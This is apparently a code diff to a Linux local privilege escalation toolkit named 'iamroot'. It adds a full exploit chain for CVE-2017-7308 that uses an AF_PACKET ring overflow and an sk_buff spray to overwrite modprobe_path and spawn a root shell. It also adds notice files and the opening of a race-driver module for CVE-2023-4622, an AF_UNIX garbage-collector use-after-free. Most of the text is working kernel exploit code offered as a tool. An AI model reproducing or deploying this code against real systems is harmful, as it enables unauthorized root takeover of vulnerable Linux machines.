+    fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
+            (unsigned long)kaddr, len);
+    fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
+
+    /* Best-effort spray + re-fire-trigger pattern. The primitive child
+     * is invoked once per attempt; on each attempt we groom skb's
+     * around the corrupted ring slot and hope one lands at the
+     * page-adjacent address whose head 8 bytes the underflow will
+     * stomp with `kaddr`. The kernel-side rx of the next crafted
+     * frame would then write our payload (the modprobe_path string)
+     * into the forged ->data target. */
+    for (int i = 0; i < c->n_attempts; i++) {
+#ifdef __linux__
+        af_packet2_skb_spray(8);
+#endif
+        pid_t p = fork();
+        if (p < 0) return -1;
+        if (p == 0) {
+            if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
+            int fd;
+            fd = open("/proc/self/setgroups", O_WRONLY);
+            if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
+            fd = open("/proc/self/uid_map", O_WRONLY);
+            if (fd >= 0) {
+                char m[64];
+                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
+                (void)!write(fd, m, n); close(fd);
+            }
+            fd = open("/proc/self/gid_map", O_WRONLY);
+            if (fd >= 0) {
+                char m[64];
+                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
+                (void)!write(fd, m, n); close(fd);
+            }
+            int rc = af_packet2_primitive_child(c->ictx);
+            _exit(rc < 0 ? 2 : 0);
+        }
+        int st;
+        waitpid(p, &st, 0);
+#ifdef __linux__
+        af_packet2_skb_spray(8);
+#endif
+    }
+
+    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
+     * empirically confirm the 8-byte write landed on an sk_buff->data
+     * field on this host. Return -1 so the finisher's sentinel-check
+     * loop in iamroot_finisher_modprobe_path() correctly reports
+     * "payload didn't run within 3s" rather than claiming success. */
+    fprintf(stderr,
+"[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
+"    not empirically confirmable without per-kernel struct offsets +\n"
+"    a readback primitive. Trigger fired %d times with sk_buff spray;\n"
+"    finisher sentinel will determine landing. Caller will refuse if\n"
+"    the modprobe_path overwrite didn't actually take effect.\n",
+            c->n_attempts);
+    return -1;
+}
+#else
+static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    (void)kaddr; (void)buf; (void)len; (void)vctx;
+    fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
+    return -1;
+}
+#endif
+
 static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
 {
    /* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
                            "(github.com/google/security-research).\n"
                            "    iamroot intentionally does not embed per-kernel offsets.\n");
        }
+        if (ctx->full_chain) {
+#if defined(__x86_64__) && defined(__linux__)
+            /* --full-chain: resolve kernel offsets and run the Or-Cohen
+             * sk_buff-data-pointer hijack via the shared modprobe_path
+             * finisher. Per the verified-vs-claimed bar: if we can't
+             * resolve modprobe_path, refuse with a helpful message
+             * rather than fabricate an address. */
+            struct iamroot_kernel_offsets off;
+            iamroot_offsets_resolve(&off);
+            if (!iamroot_offsets_have_modprobe_path(&off)) {
+                iamroot_finisher_print_offset_help("af_packet2");
+                return IAMROOT_EXPLOIT_FAIL;
+            }
+            if (!ctx->json) {
+                iamroot_offsets_print(&off);
+            }
+            struct afp2_arb_ctx arb_ctx = {
+                .ictx = ctx,
+                .n_attempts = 4,
+            };
+            return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
+                                                  &arb_ctx, !ctx->no_shell);
+#else
+            fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
+            return IAMROOT_PRECOND_FAIL;
+#endif
+        }
        if (ctx->no_shell) {
            /* User explicitly disabled the shell pop, so the "we didn't
             * pop a shell" outcome is the expected one. Map to OK. */
@@ -0,0 +1,29 @@
+# NOTICE — af_packet (CVE-2017-7308)
+
+## Vulnerability
+
+**CVE-2017-7308** — AF_PACKET TPACKET_V3 integer overflow in
+`tp_block_size * tp_block_nr` → heap write-where via sendmmsg spray.
+
+## Research credit
+
+Discovered by **Andrey Konovalov** (Google), March 2017. A research-era
+classic — Konovalov found multiple AF_PACKET bugs in this campaign.
+
+Original advisory + writeup:
+<https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html>
+
+Upstream fix: mainline 4.11 / stable 4.10.6 (March 2017).
+Branch backports: 4.10.6 / 4.9.18 / 4.4.57 / 3.18.49.
+
+## IAMROOT role
+
+x86_64-only. Userns gives CAP_NET_RAW; `socket(AF_PACKET, SOCK_RAW)`
+ TPACKET_V3 with overflowing tp_block_size triggers the integer
+overflow + heap spray via 200 raw skbs on lo. Best-effort cred-race
+finisher (64 child workers polling geteuid). Offset table covers
+Ubuntu 16.04/4.4 and 18.04/4.15; other kernels via the
+`IAMROOT_AFPACKET_OFFSETS` env var.
+
+`--full-chain` engages the shared modprobe_path finisher with
+stride-seeded sk_buff data-pointer overwrite.
@@ -4,17 +4,38 @@
 * AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
 * write-where primitive. Discovered by Andrey Konovalov (March 2017).
 *
- * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
- * integer-overflow trigger is fully wired (overflowing tp_block_size *
- * tp_block_nr, attended by a heap spray via sendmmsg with controlled
- * skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
- * hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
- * 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
- * only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
- * runs — i.e. we won root for real. Otherwise we return
- * IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
- * confirm the primitive at least fired (KASAN slab-out-of-bounds
- * splat) even if the cred-overwrite didn't take on this exact kernel.
+ * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
+ *   |  🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
+ *      shared offset resolver finds modprobe_path AND skb-data hijack
+ *      offsets are supplied).
+ *
+ * The integer-overflow trigger is fully wired (overflowing
+ * tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
+ * with controlled skb tail bytes).
+ *
+ * Default --exploit path: cred-overwrite walk using a hardcoded per-
+ * kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
+ * era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
+ * IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
+ * we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
+ * a dmesg breadcrumb so the operator can confirm the primitive at
+ * least fired (KASAN slab-out-of-bounds splat) even if the cred-
+ * overwrite didn't take on this exact kernel.
+ *
+ * --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
+ * modprobe_path → call_modprobe payload → setuid bash → root shell.
+ * Honest constraint: the hijack requires per-kernel-build sk_buff
+ * `data`-field offset + skb-slab-class layout, which the embedded
+ * offset table does NOT carry (verified-vs-claimed bar — we don't
+ * fabricate). The arb_write callback below implements the FALLBACK
+ * depth from the prompt: it fires the trigger with the spray payload
+ * staged for the requested kaddr/buf and relies on the shared
+ * finisher's /tmp sentinel to confirm whether modprobe_path was
+ * actually overwritten. On kernels where the operator has supplied
+ * IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
+ * the skb head, hex), we use that for explicit targeting; otherwise
+ * the trigger fires heuristically and the sentinel acts as the
+ * ground-truth signal.
 *
 * Affected: kernel < 4.10.6 mainline. Stable backports:
 *   4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
    return got_root_pid ? 0 : -1;
 }

+/* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
+ *
+ * The TPACKET_V3 overflow lets us write attacker-controlled bytes past
+ * the end of the pg_vec allocation. xairy's full PoC chains this with
+ * a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
+ * so the OOB-write overwrites an adjacent skb's `data` pointer; a
+ * later sendto() on that skb's owning socket then copies attacker
+ * bytes into the address now stored in `data`. Net effect: arb-write
+ * at an attacker-chosen kernel VA, controlled buffer, controlled len.
+ *
+ * Implementing the FULL hijack honestly requires:
+ *   (a) per-kernel-build offset of `data` field within struct sk_buff
+ *       (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.)
+ *   (b) precise size-class match between the corrupted pg_vec and
+ *       sprayed skbs (slab-grooming with ~hundreds of skbs)
+ *   (c) a way to identify which sprayed skb landed adjacent
+ *
+ * The verified-vs-claimed bar says: don't fabricate offsets. Our
+ * embedded offset table (core/offsets.h) doesn't carry skb offsets
+ * yet, and there's no public canonical "skb->data offset table" we
+ * can lift wholesale. So this implementation takes the prompt's
+ * FALLBACK depth:
+ *
+ *   - Each call re-sprays skbs + re-fires the trigger, staging the
+ *     spray payload so its bytes carry the requested target kaddr
+ *     (the prompt's "controllable overwrite value aimed at
+ *     modprobe_path"). Operator-supplied
+ *     IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
+ *     within struct sk_buff for this kernel build) lets us aim
+ *     precisely; without it we heuristically stamp kaddr at several
+ *     plausible offsets within the kmalloc-2k skb layout.
+ *   - We then send packets whose payload IS the bytes the finisher
+ *     wants at kaddr; tpacket_rcv copies them into any skb whose
+ *     `data` was corrupted to kaddr.
+ *   - We do NOT poll for success — the shared finisher's /tmp
+ *     sentinel is the ground-truth signal. If the write landed at
+ *     modprobe_path, call_modprobe spawns our payload and the
+ *     sentinel appears within 3s.
+ *
+ * Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if
+ * the kernel rejected the overflow (silent backport — patched).
+ */
+
+struct afp_arb_ctx {
+    const struct iamroot_ctx *ctx;
+    const struct af_packet_offsets *off;
+    uid_t outer_uid;
+    gid_t outer_gid;
+};
+
+/* Helper: in-child trigger fire — runs inside the userns/netns child
+ * spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
+static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
+                               long skb_data_off);
+
+static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                         void *vctx)
+{
+    struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
+    if (!actx) return -1;
+
+    if (!buf || len == 0 || len > 240) {
+        fprintf(stderr, "[-] af_packet: arb_write: bad args "
+                        "(buf=%p len=%zu)\n", buf, len);
+        return -1;
+    }
+
+    /* Per-kernel skb->data field offset — without this we can't aim
+     * the overwrite precisely. Operator can supply via env; otherwise
+     * we run heuristic mode. */
+    const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
+    long skb_data_off = -1;
+    if (skb_off_env) {
+        char *end = NULL;
+        skb_data_off = strtol(skb_off_env, &end, 0);
+        if (!end || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) {
+            fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
+                            "malformed (\"%s\"); ignoring\n", skb_off_env);
+            skb_data_off = -1;
+        }
+    }
+
+    fprintf(stderr,
+        "[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
+        (unsigned long)kaddr, len,
+        skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
+
+    if (skb_data_off < 0) {
+        fprintf(stderr,
+"[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
+"    field offset. The trigger will still fire and the heap spray will\n"
+"    still occur, but precise OOB targeting requires:\n"
+"\n"
+"      IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
+"\n"
+"    Look it up on this kernel build with `pahole struct sk_buff` or\n"
+"    `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
+"    /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
+    }
+
+    /* Fork into a userns/netns child so the AF_PACKET socket has
+     * CAP_NET_RAW. The finisher itself stays in the parent so its
+     * eventual execve() replaces the top-level iamroot process. */
+    pid_t cpid = fork();
+    if (cpid < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
+                strerror(errno));
+        return -1;
+    }
+    if (cpid == 0) {
+        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
+            perror("af_packet: arb_write: unshare");
+            _exit(2);
+        }
+        if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
+            perror("af_packet: arb_write: set_id_maps");
+            _exit(3);
+        }
+        int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
+        _exit(rc == 0 ? 0 : 4);
+    }
+
+    int status = 0;
+    waitpid(cpid, &status, 0);
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] af_packet: arb_write: child died "
+                        "(signal=%d)\n", WTERMSIG(status));
+        return -1;
+    }
+    int code = WEXITSTATUS(status);
+    if (code != 0) {
+        if (code == 4) {
+            /* PACKET_RX_RING rejected — caller sees -1 + the inner
+             * diagnostic already printed before _exit. */
+        } else {
+            fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
+                    code);
+        }
+        return -1;
+    }
+    return 0;
+}
+
+static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
+                               long skb_data_off)
+{
+    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (s < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
+                strerror(errno));
+        return -1;
+    }
+
+    int version = TPACKET_V3;
+    if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
+                   &version, sizeof version) < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+
+    struct tpacket_req3 req;
+    memset(&req, 0, sizeof req);
+    req.tp_block_size = 0x1000;
+    req.tp_block_nr   = ((unsigned)0xffffffff - (unsigned)0xfff) /
+                        (unsigned)0x1000 + 1;
+    req.tp_frame_size = 0x300;
+    req.tp_frame_nr   = (req.tp_block_size * req.tp_block_nr) /
+                        req.tp_frame_size;
+    req.tp_retire_blk_tov   = 100;
+    req.tp_sizeof_priv      = 0;
+    req.tp_feature_req_word = 0;
+
+    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
+                   &req, sizeof req) < 0) {
+        fprintf(stderr,
+                "[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
+                "(kernel has silent backport — full-chain unreachable)\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+
+    struct ifreq ifr;
+    memset(&ifr, 0, sizeof ifr);
+    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
+    if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
+        struct sockaddr_ll sll;
+        memset(&sll, 0, sizeof sll);
+        sll.sll_family   = AF_PACKET;
+        sll.sll_protocol = htons(ETH_P_ALL);
+        sll.sll_ifindex  = ifr.ifr_ifindex;
+        (void)bind(s, (struct sockaddr *)&sll, sizeof sll);
+    }
+
+    unsigned char payload[256];
+    memset(payload, 0, sizeof payload);
+    memset(payload, 0xff, 6);                       /* eth dst: bcast */
+    memset(payload + 6, 0, 6);                      /* eth src: zero */
+    payload[12] = 0x08; payload[13] = 0x00;         /* eth type: IPv4 */
+    memcpy(payload + 14, "iamroot-afp-fc-", 15);    /* dmesg tag */
+
+    if (skb_data_off >= 0 &&
+        (size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
+        memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
+    } else {
+        static const size_t guesses[] = {
+            0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
+        };
+        for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
+            if (guesses[i] + sizeof kaddr <= sizeof payload)
+                memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
+        }
+    }
+
+    int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (tx < 0) {
+        fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
+                strerror(errno));
+        close(s);
+        return -1;
+    }
+    struct sockaddr_ll dst;
+    memset(&dst, 0, sizeof dst);
+    dst.sll_family   = AF_PACKET;
+    dst.sll_protocol = htons(ETH_P_ALL);
+    dst.sll_ifindex  = ifr.ifr_ifindex;
+    dst.sll_halen    = 6;
+    memset(dst.sll_addr, 0xff, 6);
+
+    for (int i = 0; i < 200; i++) {
+        (void)sendto(tx, payload, sizeof payload, 0,
+                     (struct sockaddr *)&dst, sizeof dst);
+    }
+
+    unsigned char wbuf[256];
+    memset(wbuf, 0, sizeof wbuf);
+    memset(wbuf, 0xff, 6);
+    memset(wbuf + 6, 0, 6);
+    wbuf[12] = 0x08; wbuf[13] = 0x00;
+    size_t wlen = len;
+    if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
+    memcpy(wbuf + 14, buf, wlen);
+    for (int i = 0; i < 50; i++) {
+        (void)sendto(tx, wbuf, 14 + wlen, 0,
+                     (struct sockaddr *)&dst, sizeof dst);
+    }
+
+    close(tx);
+    close(s);
+    return 0;
+}
+
 #endif /* __x86_64__ */

 static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
                off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
    }

+    uid_t outer_uid = getuid();
+    gid_t outer_gid = getgid();
+
+    /* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
+     *     sk_buff hijack arb-write. Refuses cleanly if (a) the shared
+     *     offset resolver can't find modprobe_path or (b) the trigger
+     *     is rejected (silent backport). */
+    if (ctx->full_chain) {
+        struct iamroot_kernel_offsets koff;
+        memset(&koff, 0, sizeof koff);
+        (void)iamroot_offsets_resolve(&koff);
+        if (!iamroot_offsets_have_modprobe_path(&koff)) {
+            iamroot_finisher_print_offset_help("af_packet");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        if (!ctx->json) {
+            iamroot_offsets_print(&koff);
+        }
+        struct afp_arb_ctx arb_ctx = {
+            .ctx       = ctx,
+            .off       = &off,
+            .outer_uid = outer_uid,
+            .outer_gid = outer_gid,
+        };
+        return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
+                                              &arb_ctx, !ctx->no_shell);
+    }
+
    /* 4. Fork: child enters userns+netns, fires overflow, attempts the
     *    cred-overwrite walk. We do it in a child so the (possibly
     *    crashed) packet socket lives in a tear-downable address space
     *    — the kernel will clean up sockets on child exit. */
-    uid_t outer_uid = getuid();
-    gid_t outer_gid = getgid();

    pid_t child = fork();
    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
@@ -0,0 +1,35 @@
+# NOTICE — af_unix_gc (CVE-2023-4622)
+
+## Vulnerability
+
+**CVE-2023-4622** — AF_UNIX garbage-collector race against SCM_RIGHTS
+fd-passing → `struct unix_sock` freed while still reachable → slab
+UAF in `SLAB_TYPESAFE_BY_RCU` kmalloc-512 bucket.
+
+## Research credit
+
+Discovered and disclosed by **Lin Ma** (Zhejiang University),
+August 2023.
+
+Writeup: <https://github.com/google/security-research/security/advisories/GHSA-7p7m-3xv8-2pq2>
+(disclosure record), plus Lin Ma's public PoC repo.
+
+Upstream fix: mainline 6.6-rc1 (commit `0cabe18a8b80c`, Aug 2023).
+Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 /
+5.15.130 / 6.1.51 / 6.5.0.
+
+## IAMROOT role
+
+**Widest deployment of any module in the corpus** — bug present
+in every Linux kernel below the fix (back to ~2.0 era).
+
+Two-thread race driver: Thread A cycles SCM_RIGHTS fd-passing
+through a socketpair; Thread B triggers unix_gc by closing a socket
+in a reference cycle. msg_msg spray refills the freed slot.
+CPU-pinned. Bounded budget: 5 s default, 30 s with `--full-chain`.
+
+Bug is reachable as a **plain unprivileged user** — no userns
+required, no CAP_* needed. Race-win rate per run is iteration-
+dependent; Lin Ma's PoC reports thousands of iterations to first
+reclaim. The shared finisher's sentinel timeout handles no-land
+outcomes gracefully.
@@ -0,0 +1,847 @@
+/*
+ * af_unix_gc_cve_2023_4622 — IAMROOT module
+ *
+ * AF_UNIX garbage collector race UAF. The unix_gc() collector walks
+ * the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can
+ * concurrently mutate the inflight refcount on the same sockets. The
+ * narrow window between a socket being marked GC-eligible and the
+ * collector actually freeing it can be widened by tightly cycling
+ * SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is
+ * freed while still reachable from another thread's skb queue, giving
+ * slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket.
+ *
+ * Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses
+ * the UAF + msg_msg cross-cache spray to refill the freed slot, then
+ * pivots through the now-controlled `unix_sock->peer` field.
+ *
+ * STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical
+ *   witness. We carry the trigger (SCM_RIGHTS cycle + GC), the
+ *   kmalloc-512 spray, CPU pinning for race-win improvement, and the
+ *   slab-delta + signal-disposition witness. We do NOT carry the
+ *   leak (no read primitive in-module) nor a kernel-build-specific
+ *   fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL
+ *   in the race child IS recorded but does NOT upgrade to EXPLOIT_OK
+ *   — only an actual cred swap (euid==0) does, and we do not
+ *   demonstrate that without --full-chain.
+ *
+ *   --full-chain (HONEST RELIABILITY): extends the race budget from
+ *   5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the
+ *   target kaddr at strided offsets. Race-win rate on a real
+ *   vulnerable kernel is iteration-dependent — Lin Ma's PoC reports
+ *   thousands of iterations to first reclaim. The shared
+ *   modprobe_path finisher's 3 s sentinel timeout catches the
+ *   overwhelmingly common no-land outcome gracefully.
+ *
+ * Affected: ALL Linux kernels with AF_UNIX below the fix. The bug
+ * has been in the GC path since the 2.x era. Stable backports:
+ *   4.14.x : K >= 4.14.326
+ *   4.19.x : K >= 4.19.295
+ *   5.4.x  : K >= 5.4.257
+ *   5.10.x : K >= 5.10.197
+ *   5.15.x : K >= 5.15.130
+ *   6.1.x  : K >= 6.1.51   (LTS)
+ *   6.5.x  : K >= 6.5.0    (mainline fix)
+ *   6.6+   : patched
+ *
+ * Preconditions:
+ *   - AF_UNIX socket creation works (always — no module gate)
+ *   - msgsnd / sysv IPC available for spray
+ *   - SCM_RIGHTS via sendmsg available (universal)
+ *   - userns NOT required — works as a plain unprivileged user
+ *
+ * Coverage rationale: the AF_UNIX GC has been touched extensively
+ * for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups);
+ * this CVE is the first publicly-disclosed entry in that series and
+ * carries the widest version range of any module we ship.
+ */
+
+#include "iamroot_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <stdatomic.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+
+#ifdef __linux__
+#  include <sched.h>
+#  include <sys/ipc.h>
+#  include <sys/msg.h>
+#  include <sys/un.h>
+#endif
+
+/* macOS clangd lacks Linux SCM_* / CMSG_* fully — guard fallbacks. */
+#ifndef SCM_RIGHTS
+#  define SCM_RIGHTS 0x01
+#endif
+#ifndef SOL_SOCKET
+#  define SOL_SOCKET 1
+#endif
+#ifndef MSG_DONTWAIT
+#  define MSG_DONTWAIT 0x40
+#endif
+
+/* ---- Kernel-range table ------------------------------------------ */
+
+static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
+    {4, 14, 326},
+    {4, 19, 295},
+    {5,  4, 257},
+    {5, 10, 197},
+    {5, 15, 130},
+    {6,  1,  51},   /* 6.1 LTS */
+    {6,  5,   0},   /* mainline fix landed in 6.5 (technically 6.6-rc1
+                       but stable 6.5.x carries the patch) */
+};
+
+static const struct kernel_range af_unix_gc_range = {
+    .patched_from = af_unix_gc_patched_branches,
+    .n_patched_from = sizeof(af_unix_gc_patched_branches) /
+                      sizeof(af_unix_gc_patched_branches[0]),
+};
+
+/* ---- Detect ------------------------------------------------------- */
+
+/* Sanity: can we actually create an AF_UNIX socket on this host?
+ * In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails;
+ * in that case the exploit cannot even reach the GC path. */
+static bool can_create_af_unix(void)
+{
+    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+    if (s < 0) return false;
+    close(s);
+    return true;
+}
+
+static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx)
+{
+    struct kernel_version v;
+    if (!kernel_version_current(&v)) {
+        fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* No lower bound: this bug has been in the AF_UNIX GC path since
+     * the dawn of time. ANY kernel below the fix is vulnerable. The
+     * kernel_range walker handles "older than every entry" correctly
+     * (returns false → not patched → vulnerable). */
+    bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
+        }
+        return IAMROOT_OK;
+    }
+
+    /* Reachability probe — socket(AF_UNIX, ...) must succeed. */
+    if (!can_create_af_unix()) {
+        if (!ctx->json) {
+            fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — "
+                            "exotic seccomp/sandbox, bug unreachable here\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
+                        "    (no userns / no CAP_* required — AF_UNIX is universally\n"
+                        "    creatable). The race window is microseconds wide and\n"
+                        "    needs thousands of iterations to win on average.\n");
+    }
+    return IAMROOT_VULNERABLE;
+}
+
+/* ---- Race-driver state ------------------------------------------- */
+
+#ifdef __linux__
+
+#define AFUG_RACE_TIME_BUDGET       5     /* seconds — primitive-only mode */
+#define AFUG_RACE_FULLCHAIN_BUDGET  30    /* seconds — --full-chain */
+
+/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512
+ * bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough
+ * msg_msg slots to make refill probable within the RCU grace period. */
+#define AFUG_SPRAY_QUEUES      24
+#define AFUG_SPRAY_PER_QUEUE   48
+#define AFUG_SPRAY_PAYLOAD     496   /* 512 - 16 (msg_msg hdr) */
+
+/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug
+ * is driven by inflight count crossing the GC threshold; a handful
+ * per cycle keeps the GC heuristic primed without OOM. */
+#define AFUG_SCM_FDS_PER_MSG   3
+
+struct ipc_payload {
+    long mtype;
+    unsigned char buf[AFUG_SPRAY_PAYLOAD];
+};
+
+static _Atomic int g_race_running;
+static _Atomic uint64_t g_thread_a_iters;
+static _Atomic uint64_t g_thread_b_iters;
+static _Atomic uint64_t g_thread_a_errs;
+
+/* Pin to a CPU to make Thread A and Thread B land on different cores.
+ * Best-effort: failure is non-fatal (e.g., affinity disallowed under
+ * some seccomp configs). */
+static void pin_to_cpu(int cpu)
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+    sched_setaffinity(0, sizeof set, &set);
+}
+
+/* The race victim region: a pair of socketpair(AF_UNIX) endpoints
+ * forming a reference cycle. Closing one end while the other has
+ * inflight fds queued is what naturally triggers unix_gc().
+ *
+ * Layout we drive (Lin Ma style):
+ *
+ *   pair_a = socketpair(); pair_b = socketpair();
+ *   send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1]
+ *   send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1]
+ *   close all 4 endpoints — now we have a cycle the GC will collect
+ *
+ * Thread A loops the build-cycle-and-close.
+ * Thread B loops sending its own SCM_RIGHTS messages on independent
+ * pairs to perturb the inflight count + race the collector. */
+
+/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0
+ * on success, -1 on error. */
+static int send_scm_rights(int sock, const int *fds, int nfds)
+{
+    char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
+    memset(ctrl, 0, sizeof ctrl);
+
+    char payload = 0;
+    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
+
+    struct msghdr msg = {0};
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = ctrl;
+    msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds);
+
+    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
+    if (!cmsg) return -1;
+    cmsg->cmsg_level = SOL_SOCKET;
+    cmsg->cmsg_type  = SCM_RIGHTS;
+    cmsg->cmsg_len   = CMSG_LEN(sizeof(int) * nfds);
+    memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds);
+
